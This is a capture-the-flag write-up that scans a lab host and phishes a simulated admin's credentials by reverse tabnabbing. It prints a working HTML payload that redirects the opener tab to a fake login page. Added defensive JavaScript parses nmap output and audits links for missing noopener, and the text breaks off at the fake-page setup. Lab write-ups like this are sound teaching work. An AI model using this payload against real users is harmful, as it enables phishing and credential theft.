
Enumeration

$ sudo rustscan -t 3000 --tries 2 -b 8192 -u 16384 -a 10.10.63.26 -- -sS -sV -sC -oN 10.10.63.26.$(basename $PWD).nmap.txt
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 16384.
Open 10.10.63.26:22
Open 10.10.63.26:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-09 13:33 PDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.00s elapsed
Initiating Ping Scan at 13:33
Scanning 10.10.63.26 [4 ports]
Completed Ping Scan at 13:33, 0.19s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:33
Completed Parallel DNS resolution of 1 host. at 13:33, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:33
Scanning 10.10.63.26 [2 ports]
Discovered open port 80/tcp on 10.10.63.26
Discovered open port 22/tcp on 10.10.63.26
Completed SYN Stealth Scan at 13:33, 0.19s elapsed (2 total ports)
Initiating Service scan at 13:33
Scanning 2 services on 10.10.63.26
Completed Service scan at 13:33, 6.32s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.63.26.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 4.48s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.62s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.00s elapsed
Nmap scan report for 10.10.63.26
Host is up, received echo-reply ttl 61 (0.15s latency).
Scanned at 2022-07-09 13:33:20 PDT for 12s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 85:f3:f5:b4:8c:24:1e:ef:6f:28:42:33:7c:2a:22:b4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCmgxcZKHEVEbLHxkmo/bjXYP9qMuWYGmbV0Tl/maOUcfyhPcPPcl2S/RzgKgfWR5MBUit4/iD+LBbKvIqv5NsXAMjUFaC35mXLRrEhUXSP4pfcaWGzKARRJ4C9eUHJ1aT/vhU0ZNnhOW1H8Ig+btzcIqeiQJiKH+iGySyTsXJ3qLOAcQ4qwGKfdpnPtN3MYG7Ba6etdN4J+FVm/tjcUxE76ZKv5IdN+iOeTwBhKhk8lTPf6G8S7X2jx38deqAI6j20UBAnlFdfSjVrbavfzoeyAKODpzmgQ0J/VFWIZGqqMxg/Hq6KChT67DTMxrnfN7wojS2/fItjIpsvjTxlxhiHSvi+57ngJlPYKbiqU4P1nbxSB+eyy0UK44ln6MbLpCcRkvwOP87VOvfII4TfXostq94fYRW8G7oszKGFrucQdYoVTFhKgYveKe0np4eGG/GdPefDbLp5VoNTjs7WBDSxn5jY+0A/IY1/EjuaGlQvpk5IxDbU/mYm9bPeSYdAWgk=
|   256 c2:7b:a9:0c:28:7c:d1:cd:03:23:f4:a8:bc:02:72:4b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBP4j+pg12EElUiOMAVpEuqFCympfDuyyZ7McBGxU9lCp4qMOGKShc96y4656MSnAZu7ofMx9DyO1sDwcfbI3MQ=
|   256 fe:92:00:b4:ee:5e:5a:92:52:90:9f:5e:0b:fd:61:a3 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ0X6D1WGTnXedsm4aFXKIEt6iY22msqmq2QvKPW3VXM
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Login
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:33
Completed NSE at 13:33, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.30 seconds
           Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
Ports    Service   Notes
22/tcp   SSH       OpenSSH 8.2p1
80/tcp   HTTP      Apache 2.4.41
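The summary table above is built by hand from the nmap report. As an added example (not part of the original writeup), the JavaScript below parses nmap's normal output (-oN) for open ports, their service/version strings and the NSE script output attached to each port, then derives the same Ports/Service/Notes rows and pulls the http-cookie-flags finding (PHPSESSID without httponly) out as an explicit item. The report text embedded below is a constructed excerpt in the same format as the scan above.

```javascript
// Added example: parser for nmap normal output (-oN), not the writeup's own code.
// SAMPLE_REPORT is a constructed excerpt of the scan shown above.
const SAMPLE_REPORT = `
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 85:f3:f5:b4:8c:24:1e:ef:6f:28:42:33:7c:2a:22:b4 (RSA)
|_  256 fe:92:00:b4:ee:5e:5a:92:52:90:9f:5e:0b:fd:61:a3 (ED25519)
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Login
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
`;

// Parse one "<port>/<proto> <state> <service> <reason> [ttl N] <version>" line.
function parsePortLine(line) {
  const m = /^(\d+)\/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$/.exec(line);
  if (!m) return null;
  const rest = m[5].trim();
  // The REASON column is one token (e.g. "syn-ack"), optionally followed by "ttl <n>".
  const r = /^(\S+)(?:\s+ttl\s+\d+)?\s*/.exec(rest);
  return {
    port: Number(m[1]), proto: m[2], state: m[3], service: m[4],
    reason: r ? r[1] : '', version: r ? rest.slice(r[0].length) : '', scripts: [],
  };
}

// Walk the report: port lines open a new entry; "|"/"|_" lines are NSE output
// belonging to the most recent port. An unindented "name: value" opens a script,
// indented lines are continuation lines of the current script.
function parseNmapReport(text) {
  const ports = [];
  let current = null;
  let script = null;
  for (const raw of text.split('\n')) {
    const entry = parsePortLine(raw);
    if (entry) { ports.push(entry); current = entry; script = null; continue; }
    if (!current || raw[0] !== '|') continue;
    const body = raw.slice(2);            // strip "| " or "|_"
    const header = /^([\w-]+):\s?(.*)$/.exec(body);
    if (header && !body.startsWith(' ')) {
      script = { name: header[1], lines: [] };
      if (header[2].trim()) script.lines.push(header[2].trim());
      current.scripts.push(script);
    } else if (script) {
      script.lines.push(body.trim());
    }
  }
  return ports;
}

// Rows equivalent to the hand-written Ports / Service / Notes table.
function summarize(ports) {
  return ports.filter(p => p.state === 'open').map(p => ({
    port: `${p.port}/${p.proto}`, service: p.service.toUpperCase(), notes: p.version,
  }));
}

// Surface http-cookie-flags findings (path -> cookie -> issue) as explicit items,
// so a session cookie without httponly is not buried in the script output.
function cookieFindings(ports) {
  const out = [];
  for (const p of ports) {
    for (const s of p.scripts) {
      if (s.name !== 'http-cookie-flags') continue;
      let path = '';
      let cookie = '';
      for (const line of s.lines) {
        if (/^\/.*:$/.test(line)) path = line.slice(0, -1);          // "/:"
        else if (/^[^\s:]+:$/.test(line)) cookie = line.slice(0, -1); // "PHPSESSID:"
        else out.push({ port: `${p.port}/${p.proto}`, path, cookie, issue: line });
      }
    }
  }
  return out;
}

const parsed = parseNmapReport(SAMPLE_REPORT);
console.table(summarize(parsed));
console.table(cookieFindings(parsed));
```

The parser is deliberately line-oriented: nmap's -oN format is stable enough that a regex per port line plus the "|"/"|_" prefix convention covers service scans with NSE output, and the cookie-flag rows give a checklist item (set HttpOnly, and Secure once the site is on TLS) for the report rather than a line to spot by eye.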

We've found a login and registration page. We've also found a form that lets us submit links which the "admin" will then "manually" click on and review. So we can potentially steal credentials or reset the admin's password.


Exploitation

After some time and research, and much prodding from the Twitch chat, we found that we could use a technique called tab nabbing (reverse tabnabbing), in which a page opened in a new tab uses its window.opener reference to redirect the tab the victim came from to a malicious page we control. On this malicious page the admin was prompted to log in, and because it was our phishing site (which looked like the real thing) the admin entered their credentials. We can see them come in over the wire in a packet capture (Wireshark or tcpdump).

The setup for this attack looked like the following:

We read through the HackTricks notes on (reverse) tab nabbing to make sure we had all the prerequisites to perform the attack.

  1. Send the admin a link to a "malicious" site that we control, which will redirect the admin's tab to another page.
  2. Here's our "malicious" page:


<!DOCTYPE html>
<html>
  <body>
    <!-- Runs in the tab the admin opened from the review page; window.opener
         is the admin's original tab, which is sent to our fake login page. -->
    <script>window.opener.location='http://10.13.14.1/admin/login.php';</script>
  </body>
</html>
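What makes this redirect possible is that the admin's review page opened our link in a new tab while leaving the new page a usable window.opener reference: a target="_blank" link without rel="noopener", or window.open without the noopener feature (recent browsers imply noopener for target="_blank", but explicit rel still matters for older browsers and for window.open). As an added example that is not part of the original writeup, the JavaScript below checks a page's HTML for anchors with that weakness and produces a hardened copy; the sample HTML, URLs and function names are constructed for the example.

```javascript
// Added example (not the writeup's code): find target="_blank" anchors that keep
// a window.opener reference (no rel="noopener"), and harden them.
// SAMPLE_HTML is a constructed stand-in for a "submit a link for review" page.
const SAMPLE_HTML = `
<ul>
  <li><a href="http://example.test/post/1" target="_blank">Post 1</a></li>
  <li><a href="http://example.test/post/2" target="_blank" rel="noopener">Post 2</a></li>
  <li><a href="http://example.test/post/3">Post 3</a></li>
  <li><a href='http://example.test/post/4' target='_blank' rel='nofollow'>Post 4</a></li>
</ul>`;

// Matches each <a ...> opening tag (simple regex; fine for an audit script,
// not a full HTML parser: a ">" inside an attribute value would break it).
const ANCHOR_RE = /<a\b[^>]*>/gi;

// Parse the attributes of one <a ...> opening tag into a Map (names lowercased).
function parseAttrs(tag) {
  const attrs = new Map();
  const attrRe = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  const body = tag.replace(/^<a\b/i, '').replace(/\/?>$/, '');
  let m;
  while ((m = attrRe.exec(body)) !== null) {
    attrs.set(m[1].toLowerCase(), m[2] ?? m[3] ?? m[4] ?? '');
  }
  return attrs;
}

// Anchors that allow reverse tabnabbing: target=_blank without "noopener" in rel.
function findTabnabbingLinks(html) {
  const findings = [];
  for (const tag of html.match(ANCHOR_RE) ?? []) {
    const attrs = parseAttrs(tag);
    if ((attrs.get('target') ?? '').toLowerCase() !== '_blank') continue;
    const rel = (attrs.get('rel') ?? '').toLowerCase().split(/\s+/);
    if (!rel.includes('noopener')) findings.push({ href: attrs.get('href') ?? '', tag });
  }
  return findings;
}

// Hardened copy of the HTML: every target=_blank anchor gets
// rel="noopener noreferrer", merged with any rel tokens it already had.
function hardenLinks(html) {
  return html.replace(ANCHOR_RE, (tag) => {
    const attrs = parseAttrs(tag);
    if ((attrs.get('target') ?? '').toLowerCase() !== '_blank') return tag;
    const tokens = new Set((attrs.get('rel') ?? '').toLowerCase().split(/\s+/).filter(Boolean));
    tokens.add('noopener');
    tokens.add('noreferrer');
    const relValue = [...tokens].join(' ');
    if (attrs.has('rel')) {
      // Replace the existing rel attribute (preceded by whitespace) in place.
      return tag.replace(/\srel\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+)/i, ` rel="${relValue}"`);
    }
    return tag.replace(/\/?>$/, (end) => ` rel="${relValue}"${end}`);
  });
}

console.log('weak links:', findTabnabbingLinks(SAMPLE_HTML).map(f => f.href));
console.log(hardenLinks(SAMPLE_HTML));
```

Running the audit over the sample reports Post 1 and Post 4 as weak, and the hardened output passes the same check with no findings. The same fix applies on the JavaScript side: window.open(url, '_blank', 'noopener') instead of a bare window.open(url), and the server can additionally set Cross-Origin-Opener-Policy so that a cross-origin page cannot hold a reference to the opener at all.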

We also set up a fake admin login page on our server at admin/login.php (an admin subfolder containing login.php):
